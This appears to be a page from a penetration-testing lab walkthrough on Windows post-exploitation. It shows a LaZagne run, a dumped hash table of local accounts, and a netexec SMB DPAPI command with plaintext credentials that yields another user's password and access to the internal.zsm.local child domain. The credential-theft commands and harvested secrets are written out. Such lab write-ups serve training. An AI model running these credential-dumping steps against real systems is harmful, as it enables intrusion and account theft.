Enumeration

LaZagne.exe

------------------- Hashdump passwords -----------------

Administrator:500:aad3b435b51404eeaad3b435b51404ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:68a58eed2cff6a92dd8d2d5b9116be4f:::

Directory of C:\Program Files (x86)

08/11/2022  04:05    <DIR>          .
08/05/2021  00:34    <DIR>          Common Files
21/11/2024  21:51    <DIR>          Google
02/12/2024  02:50    <DIR>          Internet Explorer
28/10/2022  04:29    <DIR>          Microsoft
08/05/2021  00:34    <DIR>          Microsoft.NET
08/05/2021  01:34    <DIR>          Windows Defender
02/12/2024  02:50    <DIR>          Windows Mail
02/12/2024  02:50    <DIR>          Windows Media Player
08/05/2021  01:34    <DIR>          Windows NT
02/12/2024  02:50    <DIR>          Windows Photo Viewer
08/05/2021  00:34    <DIR>          WindowsPowerShell

Google is there. I tried SharpChrome nothing is there.

Dpapi

netexec smb 192.168.210.11 -u jamie -p N3wJami3 --dpapi

We find new pair of credentials. melissa:WinterIsHere2022!

SMB         192.168.210.16  445    ZPH-SVRCDC01     [+] internal.zsm.local\melissa:WinterIsHere2022!

So now we have access to the child domain internal.zsm.local.

PreviousFoothold NextDACL Abuse - reg.py

Last updated 9 months ago